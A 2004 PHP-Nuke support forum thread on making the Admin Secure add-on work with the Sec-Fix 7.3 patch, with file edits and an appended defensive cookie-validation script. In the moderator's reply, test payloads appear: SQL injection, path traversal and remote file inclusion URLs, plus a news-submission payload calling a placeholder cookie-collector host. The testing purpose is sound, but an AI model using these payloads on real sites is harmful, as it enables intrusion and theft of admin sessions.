Nuke Cops :: View topic - Admin Secure 1.7 don't work with Sec-Fix Patch 7.3
JeZMaN (Nuke Cadet; Joined: Dec 09, 2003; Posts: 7)
Posted: Mon Jun 14, 2004 5:28 am

Hi madman,

I'm using PHP Nuke 7.3 on a server with Apache 1.3.31 and PHP 4.3.7. Now I have installed Sec-Fix Patch 7.3 from www.nukefixes.com, but now Admin Secure doesn't work. Maybe because of the new $_SERVER['SCRIPT_NAME'] instead of $_SERVER['PHP_SELF']... I don't know...

Can you check if Admin Secure works with the new Sec-Fix Patch 7.3?

Thanks madman
madman (Support Mod; Joined: Feb 15, 2004; Posts: 806)
Posted: Mon Jun 14, 2004 11:21 am

If you just replace the old files with those fix files, then you'll never get Admin Secure to work.

You'll have to modify two nuke files after installing fixes from ChatServ. Here they are:

Open/Edit auth.php, and find these lines:

Code:
$admin = base64_encode("$aid:$pwd:$admlanguage");
setcookie("admin","$admin",time()+2592000);
unset($op);


After those lines, add:

Code:
$_COOKIE['admin'] = $admin;


Find:

Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


Replace with:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


Save/close auth.php. Now open mainfile.php, and find the following lines:

Code:
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections


Before, add:

Code:
function nuke_getRootPath() {
  $ret  = "./";
  if (eregi('\/modules\/[^\/]+\/[^\/]+\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../../../"; }
  else if (eregi('\/modules\/[^\/]+\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../../"; }
  else if (eregi('\/modules\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../"; }
  return $ret;
}
require_once(nuke_getRootPath().'includes/asfunc.php');


Find:

Code:
function is_admin($admin) {


After that line, add:

Code:
return asec_isAdmin($admin);


Find: (at the end of mainfile.php)

Code:
function stripos_clone($haystack, $needle, $offset=0) {
  return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}


After those lines, add:

Code:
asec_performFilterNotify();
asec_performRealTimeNotify();
asec_performAutoCheckNotify();


Save/close mainfile.php, then upload both modified files (the auth.php and mainfile.php from ChatServ's fixes) back to your server.

PS:
You don't have to modify admin.php, since I can't find a patched admin.php in ChatServ's fixes for Nuke 7.3.

JeZMaN (Nuke Cadet; Joined: Dec 09, 2003; Posts: 7)
Posted: Mon Jun 14, 2004 12:39 pm

madman wrote:
If you just replace the old files with those fix files, then you'll never get Admin Secure to work.

I downloaded the fixes from ChatServ and made the changes, but it doesn't work.

I tried with the changes from install.txt and with the changes from this post.

I'm using the admin.php file from PHP Nuke Patched 2.4 http://www.nukeresources.com/downloadview-details-874-Nuke_7.3_Patched.html (I'm using PHP Nuke Patched 2.4 and the Sec-Fix Patch).

Have you tested whether your Admin Secure 1.7 works with Sec-Fix Patch 7.3?

I tried with an exploit, but I don't know if my exploit "works" with Admin Secure. Could you send me an exploit by PM to test my Admin Secure?

Thanks.
madman (Support Mod; Joined: Feb 15, 2004; Posts: 806)
Posted: Mon Jun 14, 2004 1:43 pm

JeZMaN wrote:
I'm using the admin.php file from PHP Nuke Patched 2.4 http://www.nukeresources.com/downloadview-details-874-Nuke_7.3_Patched.html (I'm using PHP Nuke Patched 2.4 and the Sec-Fix Patch).


Just downloaded it.
I tried installing this patch, made the changes in the nuke files, and everything seems to work.

JeZMaN wrote:
Have you test if your Admin Secure 1.7 works with Sec-Fix Patch 7.3?


I have tested it in the original 7.3 and with the secfix73 patch. Both work fine.

JeZMaN wrote:
I had tried with a exploit, but i don't know if my exploit "works" with Admin Secure. Can see sendme by PM a exploit for test my Admin Secure?


Admin Secure catches any exploits at the last attempt, after the other security addons. In 7.3, part of the Fortress/UTC code was embedded internally and will catch them first, before Admin Secure.

To know whether Admin Secure works or not, try removing/commenting out the internal Fortress/UTC code, or try some exploits not covered by UTC. For example:

Code:
http://foo.bar/index.php?test=1 union%7fselect/**/test%0d%0afrom/**/nuke_hacktest
http://foo.bar/modules.php?name=../../../usr/pwd/password.txt
http://foo.bar/index.php?modfile=http://bar.foo/hacking.php?mode=inject


Or another attempt: submit a news item from the Submit_News module and put some text like this in it:

Code:
<img border=0 src="admin.php?op=addAuthors">
<ilayer src="http://foo.bar/hack/cookicollector.php?id=get&cookie=blabla">

JeZMaN (Nuke Cadet; Joined: Dec 09, 2003; Posts: 7)
Posted: Mon Jun 14, 2004 4:04 pm

madman wrote:
Admin Secure catches any exploits at the last attempt, after the other security addons. In 7.3, part of the Fortress/UTC code was embedded internally and will catch them first, before Admin Secure

Yes... that was the "problem". I tried with this exploit:

Code:
<img border=0 src="admin.php?op=addAuthors">
<ilayer src="http://foo.bar/hack/cookicollector.php?id=get&cookie=blabla">

And Admin Secure caught it


Now I have a few questions...

In admin.php, do I have to add this line?:

Code:
if ($admintest && ($op != "logout")) { asec_checkAdminAccess(); }


In mainfile.php:

Code:
function is_admin($admin) {
  return asec_isAdmin($admin);
}


or

Code:
function is_admin($admin) {
return asec_isAdmin($admin);
    global $prefix, $db;
    if(!is_array($admin)) {
   $admin = addslashes($admin);
   $admin = base64_decode($admin);
   $admin = explode(":", $admin);
        $aid = "$admin[0]";
   $pwd = "$admin[1]";
    } else {
        $aid = "$admin[0]";
   $pwd = "$admin[1]";
    }
    if ($aid != "" AND $pwd != "") {
        $aid = substr("$aid", 0,25);
        $result = $db->sql_query("SELECT pwd FROM ".$prefix."_authors WHERE aid='$aid'");
   $row = $db->sql_fetchrow($result);
   $pass = $row['pwd'];
   if($pass == $pwd && $pass != "") {
       return 1;
   }
    }
    return 0;
}


And in auth.php, do I replace this:

Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


With:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


or with:

Code:
$admintest = 0;
$admin = $_COOKIE['admin'];

if(isset($admin) && $admin != "") {


Sorry for those questions... but install.txt and your code in this post are different...

Thanks madman, and sorry for my bad English, I'm Spanish...
madman (Support Mod; Joined: Feb 15, 2004; Posts: 806)
Posted: Mon Jun 14, 2004 4:38 pm

JeZMaN wrote:
I tried with this exploit:
And Admin Secure caught it


That's the way it works.
Admin Secure only catches the exploits that are not handled by any other security addon, acting as the last protection layer for your site.

JeZMaN wrote:
Now I have a few questions...
In admin.php, do I have to add this line?:
Code:
if ($admintest && ($op != "logout")) { asec_checkAdminAccess(); }


Yes, to inform admins whenever their account has been changed and requires approval. It's optional, but if it is absent, admins have no clue why they can log in but cannot gain access to the admin menu.

JeZMaN wrote:
mainfile.php
Code:
function is_admin($admin) {
  return asec_isAdmin($admin);
}

or
Code:
function is_admin($admin) {
return asec_isAdmin($admin);
    global $prefix, $db;
    if(!is_array($admin)) {
   $admin = addslashes($admin);
   $admin = base64_decode($admin);
:
:
}


You can use either of them.
Use the first one to reduce the file size.

JeZMaN wrote:
And in auth.php, do I replace this:
Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


With:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


or with:

Code:
$admintest = 0;
$admin = $_COOKIE['admin'];

if(isset($admin) && $admin != "") {


You can use either of them.
The first one adds another layer of security by ensuring that the admin variable taken from the cookie is a true base64-encoded string.

JeZMaN wrote:
Sorry for those questions... but install.txt and your code in this post are different...


They provide similar protection.
I posted a different method here as an alternative.

JeZMaN wrote:
Thanks madman, and sorry for my bad English, I'm Spanish...


Don't worry, your statements are very clear to me.
My native language is neither English nor Spanish.

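Added example (not Admin Secure's, Sec-Fix's or madman's code): a stand-alone script illustrating the auth.php change from madman's first post, and his later remark that the preg_match version ensures the admin cookie is a true base64 string. It reads $admin only from the cookie array, applies the same character whitelist, and then splits the "aid:pwd:admlanguage" layout the way mainfile.php's is_admin() does, so you can see which cookies never reach the database query. The function names and the sample cookies are constructed for this example.

```php
<?php
// Added example, not part of Admin Secure or the Sec-Fix patch.
// Function names are hypothetical; sample cookies are constructed.

// Same whitelist as the auth.php replacement in this thread: only base64
// alphabet characters may appear, so nothing else reaches base64_decode().
function asec_cookie_is_base64($value)
{
    return is_string($value) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $value) === 1;
}

// Mirrors the replaced auth.php block: $admin comes only from the cookie
// array, and only when it passes the whitelist; otherwise it is the empty
// string and the "if(isset($admin) && $admin != "")" branch is never taken.
function read_admin_cookie(array $cookies)
{
    return (isset($cookies['admin']) && asec_cookie_is_base64($cookies['admin']))
        ? $cookies['admin'] : '';
}

// Decodes the "aid:pwd:admlanguage" string that auth.php builds with
// base64_encode(), the way mainfile.php's is_admin() splits it.
// Returns null for anything that does not yield a usable aid/pwd pair.
function decode_admin_cookie($admin)
{
    if ($admin === '') {
        return null;
    }
    $raw = base64_decode($admin, true);   // strict mode: stray characters fail
    if ($raw === false) {
        return null;
    }
    $parts = explode(':', $raw);
    if (count($parts) < 2 || $parts[0] === '' || $parts[1] === '') {
        return null;
    }
    // is_admin() truncates the account name to 25 characters before querying
    return array('aid' => substr($parts[0], 0, 25), 'pwd' => $parts[1]);
}

// Constructed sample cookies, as a browser would present them in $_COOKIE.
$samples = array(
    // what auth.php sets after a successful login (constructed credentials)
    'valid login'   => base64_encode('God:' . md5('example-password') . ':english'),
    // a value that never went through base64_encode(): rejected by the whitelist
    'raw tampering' => "God' OR '1'='1",
    // base64 alphabet only, but it decodes to "ABC", not an aid:pwd pair
    'junk base64'   => 'QUJD',
    // no admin cookie at all
    'absent'        => null,
);

foreach ($samples as $label => $cookie) {
    $cookies = ($cookie === null) ? array() : array('admin' => $cookie);
    $admin   = read_admin_cookie($cookies);
    $decoded = decode_admin_cookie($admin);
    printf("%-14s -> whitelist %s, decoded %s\n",
        $label,
        $admin === '' ? 'rejected' : 'passed',
        $decoded === null ? 'nothing' : 'aid=' . $decoded['aid']);
}
```

Run it with php from the command line. Only the "valid login" sample reaches the decode step with an account name; the whitelist stops the raw tampering value before it is ever decoded, and the junk value passes the whitelist but fails the aid:pwd check, which is why the whitelist and is_admin()'s own check complement each other rather than replace each other.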
Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com